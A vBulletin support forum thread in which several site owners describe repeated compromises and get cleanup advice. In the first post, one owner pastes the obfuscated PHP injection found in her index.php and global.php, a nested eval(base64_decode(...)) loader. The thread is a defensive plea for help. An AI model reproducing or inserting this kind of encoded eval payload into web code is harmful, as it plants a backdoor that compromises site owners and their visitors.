Announcement

Collapse
No announcement yet.

Forum getting hacked over and over. Please help :(

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] Forum getting hacked over and over. Please help :(

    Hi VB support,

    My full updated 4.2.2 forum of 8 years has recently been getting hacked over and over within the past few months, despite my endless attempts to secure it. I've changed passwords - database, forum and FTP. I've checked for unauthorised admin accounts. I've followed various tutorials and guides on protecting against hackers, including the default advice from my webhost, and the ones posted here. I've removed all hacks. I always ensure the install folder is deleted. I've even gone to the extent of deleting ALL files off the server and uploading fresh ones and just running off those alone. I only have the one custom template installed.

    This has only recently become a problem. For 7 years our site was not hacked once, and nothing new has been added recently. But now its happening frequently.

    This is the code I keep finding injected into index.php, and global.php, which makes my forum go blank:

    Code:
    eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1eFpGVXhSbkpuZWtGUkwybDBOMGRMVkVOSFRHRjFaM3BDT0dOQk9WUndTRTlSWjFkaFQwbHFSelpFZEVWT01tODJhSFl6TmpscE4xZHNiV3h1TmpocFZua3pNekV6T1RFeU9HUm9ZM1pxT0RkcE9Wb3dheko2YjJoVE9YUmFjakJWT1ZOalZXMTJOemxNYzJ4NEsxb3ZiVVY0U25oak0xSkxMMEpyZDNRdk1FNVhORmM0UzBnMVduWnBiV29yVWxsNVltczBlVTByZUVSbWVFbENkVmRMVVhwV2RscGFZMVpWY1ZKcmFrd3pRek5vTVcxVVpYTTVNVzVEY1ZoNk1tVndhRXA0U21kRGEwRmlkMFJwWVcwdk1VMXFSbE56Tkd4aFFVSlVTMEZLZW5CRVNtVTBNMGx4U1M4dlUzaHdVVnBxVm1kblkyMHhiRzVhT1hKRE1uUkNaMk5wYW01SlQycEVaME5CUWpCVVVGTlZORmhSTkhOa1MwVXlOMEoxTTJKSE1GQmxOREZrTHpKd2VXNXliV3RTTlU5MGMweERWMnN4TUdGSWVqSm1OazkwZVN0bVRuRjBWbEpsTVVKaE5rNHpRa1ZaTUdWYWJtbzBjWE4wTkZOeVpIWnVRbGRaTmxkbk56aEdiMjA1YjNFeGFXZ3pOM3BITmpZNU0zSm9hRTh3VjFJNWR5dGxXU3MwTnpaUVMwazNjV1JqTkU1TlFWZ3Jaa2Q1Y1cxWlZIbzRRV1ZEUzB0T01EMG5LU2twT3lBL1Bqdy9JR1YyWVd3b1ozcDFibU52YlhCeVpYTnpLR0poYzJVMk5GOWtaV052WkdVb0oyVk9jRTVWYkRGMmJUQkJVUzlEZEN0elNWRjBWbE13SzJwQ1ZWVTRaVUpoUVZSbGFGWlhTVzVJUm5oV1ZsSjZVVUpJVW1jeE0zbHVObTQ0VUU4d04xTjJkWHAxTjJRM2RYcE5OMlJ5Tm1GTk5pdDRVVlIxY0doT2N6TnRaalpoVW5aVU5tUnZiVWR0Y0dSM05WTklXbWhoZUNzd2MwWkRUalpNVkVwU09ESnRXVEYzTkdSV2FqQkxjV0pOU1RGTFExVlhlVlk0ZERoME5sWkxiM2xFUTNoT09HNXVhM1Z0YjJveVdIbEpXbTVuWXpSMFFqVlNNalpEYmxOVldrTlRMMjlzVTBORldEUlhPR3cxU0hnMU1UbEthMWQ0V0hsYU9ESmpWR3hCTkdkYWRUUllhekUxVlVsVlQyOXJWekZNVVdoTmVYRjZNblp2U0hKd05tc3JZVFp4Y1VaRVIzWm5SRFJFWW5aS1IyMVpXalpuYm1sa2N6ZHNWSEpaWVRoVWVIZGtWWHB6VG5SWk16RklkMHhFWnpWYWQwRTVPV3RSVnpreU4wcEVTUzlPVkZnMWVFUkVZV2xSYTBab2JIVldNVmROVG1wVFUzUmFaM0JNZDNsYU5taGlhbUpuTDNaME1tZERRM2hTT1dKM1FuZHRhemQwVFRkQ2NGTXZZV3R0TjFGRU0waFZUak5DU1cxS1VIcHVlR0pUUWxKUFRHbHFSSEl4ZG5OcE1qUkJVVFJqTTJ4aWFGWmxZMWN6Vm5JM1MzcEtkemhqYUM4clpqZGhTVkUyWjBZMFNYVlBNSFpsZFd4WlprSTNkbWx4SzA5eFRFTjRTREJhUlhSMWRsbEtiM2N2YlZCNFJuaFdkMDQwTmxJdlFYaHVTMDFqV1hsbmQzaHFTSFlyZDJjNFZsRnJTV2xMZFhGelpUaFpRbFUwY0VKelEzSnRRekV3TVVSa2JVWjFTRVpFS3pGWVkyNXpWRVZyWW1KMFlUTk9UREE1Y0ROYWVrdHBXWGx4WkV4WU9HMWhWSGhKVld4dU1DdHFOMDVRYzNoMkwzbzNRWE55VFhoUVNUMG5LU2twT3lBL1Bqdy9JR1YyWVd3b1ozcDFibU52YlhCeVpYTnpLR0poYzJVMk5GOWtaV052WkdVb0oyVk9jRGxyT1hSeFp6QkJVVkZJSzJ4Q1ZXdGpZVzlQZW5KcVkydEVlVzVaT1VOSE1IaGthU3RwVUZkc2JHZHhiR2RYUW5CS1ptcDJNVlJWTWxVell6Tm5jR1JvZW04MGVuZzVWbGxpZURWMVZuQjBkRTVwTDNGd2NHcHViVm95WWlzNU0xZzFOblJ3UVRCVVZtMTZiRWRXT0hwdVNISjVUVlZaYW5WM2FHMVFZM2hJUVdKSVdtaFVUaXREZFZkck1GcFhSbUp3ZVhSaFVuSkhUbXNyWXpSQldrSTBNWFpJU0hKSVZqWTJSbVJDU2tWdmMzQlRWazlpYTB3d0wxWTFPV3hJT0dwUFJqUTBVR1ZHTmxSSVNWQkdPSGhXTTJoUlRqaFhSVUZPZFc1SGEzSnZWVVZwT1VacU0wRlJla2hLVFZwWVpIQXJiR2RyT0ZjeVkzaEZhM1UxYlVOVU5VWk5XRVpMZERGbVNpOXRabEl5Y0VSWVpHOUJOakkyTmxRdldXSnBLM0k1WjJsRFlYTlJia05HVFdwQlZVVmpUbEpKVTJoTGMxSjBRVzVxWVdobmEycExaR2hIUjBZNFJHVk5VVXAwUVhkdVJFTm9hSEZIVDFWVFRWb3ZNVzVYWVUxaVQyTTFPVzFqVG5rMlUybG5XVWxQWTNOU1JqSnFVbXBoYW5Oc1JtcHRNVWhpTWs5dFIyYzVhWFpGYTJWT2J6RkRkV2RMYUhsRVVIQnBUWE5QU0N0VWNtSlZabXhVTVdReFVESnlZblJNZUZWcVUyVXdQU2NwS1NrNyIpKTsNCg=="));
    Please help. My webhost has given up on helping me with this. I'm at wits end. What more can I do?

    This is my website: http://www.theparentsanctuary.net/forums/index.php

    Thanks so much in advance for any advice.

    Nikki.
    http://www.theparentsanctuary.net - Free to use Australian parenting forum providing advice, support, friendship, competitions and more to parents and parents-to-be.

  • #2
    Have you checked your plugins? Are there any suspicious ones?

    Comment


    • #3
      I think you should consider changing your host as well as this really does not sound good at all.

      Comment


      • #4
        Exactly the same is happening here...

        Comment


        • #5
          http://www.vbulletin.com/forum/forum...-base64-please

          Comment


          • #6
            Have you checked your error_logs? Normally you can trace where any 'backdoor' is present using this technique, I have fixed many forums where base64 has been injected into the database. If you need help let me know. If you have a VPS or dedicated box, you can easily lock down the server more securely than it's default settings - not recommended though if you use shared hosting.

            Comment


            • #7
              I'm also facing the same battle

              My host has been super helpful

              My forum is on a dedicated Linux box and the hosting itself is not the problem

              My forum has been hacked about 7 times since mid-December

              I am on 4.2.2 and still getting hacked every few days despite changing all passwords, removing all rogue files etc

              I am now losing advertisers and the goodwill is fading away

              Having been a long time licence payer I am at a loss as to what to do next

              Comment


              • #8
                Additionally, I am not able to launch the forum without disabling plugins

                A blank page is shown if define("DISABLE_HOOKS", true); is removed from includes/config.php

                Comment


                • #9
                  Here is what I can share after my 5th hacking last night. If you run the admincp -> diagnostics -> suspect files, it wont find the backdoor and I cant figure out why vb hasnt been more forward.

                  A perfect example is this thread http://www.vbulletin.com/forum/forum...cp-login-pages

                  I have found two php fils that the diagnostic never found that my hosting provider has confirmed existed for 10 days prior to hacking even though I had run the suspect files job multiple times.

                  There is a good chance that these are the backdoors that are allowing people back in. But in weeks of reading vb support on restoring after a hacking, there has been no mention of what was in this thread. My guess is that you have some bogus php pages in some folders that no matter how many times you run suspect files or upload new 4.2.2 files, those pages will never get removed.

                  Comment


                  • #10
                    I am still not getting a warm fuzzy on my thread http://www.vbulletin.com/forum/forum...need-some-help

                    and have submitted a support ticket to try and get clarity

                    Comment


                    • #11
                      You need to go through the steps stickied here: http://www.vbulletin.com/forum/forum...ring-your-site

                      Anything with base64 is bad and needs to be completely deleted from your site. Any additional admins that you didn't create should be deleted. Any moderators that permissions to add announcements, should have that permission removed. Each step in the thread above needs to be followed and completed.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API

                      Comment


                      • #12
                        My site too has been hacked recently and i was comparing my old files and even the cron.php file from my old 4.1.1 version had base64 decode crap in it....... if i do a total reload of the new forum code would this eliminate that?

                        edit: even my 4.0.4 has base 64 in it?

                        edit: ok pulled up the exact zip folder i DL from vb back in 2010, vb 4.0.4 and it has base 64 decode in it also?? anything base 64 is bad? why is it in the original upload?
                        Last edited by Streetgliderx; Fri 10 Jan '14, 5:32pm.

                        Comment


                        • #13
                          Dang that doesnt make you feel good does it....

                          Comment


                          • #14
                            Wow, thanks for all the responses. Sucks that so many others are dealing with the same issue There's gotta be a way to stop this, surely??

                            Originally posted by Wayne Luke View Post
                            You need to go through the steps stickied here: http://www.vbulletin.com/forum/forum...ring-your-site

                            Anything with base64 is bad and needs to be completely deleted from your site. Any additional admins that you didn't create should be deleted. Any moderators that permissions to add announcements, should have that permission removed. Each step in the thread above needs to be followed and completed.
                            Hi Wayne,

                            Could I please have further advice on this part: "Close access to your AdminCP using .htaccess. Use either user authorization with a different username and password or IP address restrictions."

                            How exactly do I do this? I know where the .htaccess file is, just don't know what to enter into it.

                            Thanks.
                            http://www.theparentsanctuary.net - Free to use Australian parenting forum providing advice, support, friendship, competitions and more to parents and parents-to-be.

                            Comment


                            • #15
                              Originally posted by RedTrinity View Post

                              How exactly do I do this? I know where the .htaccess file is, just don't know what to enter into it.
                              Don't put anything in the root .htaccess file you need to create a new one in the admincp folder or if you have a control panel use the directory protect function.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X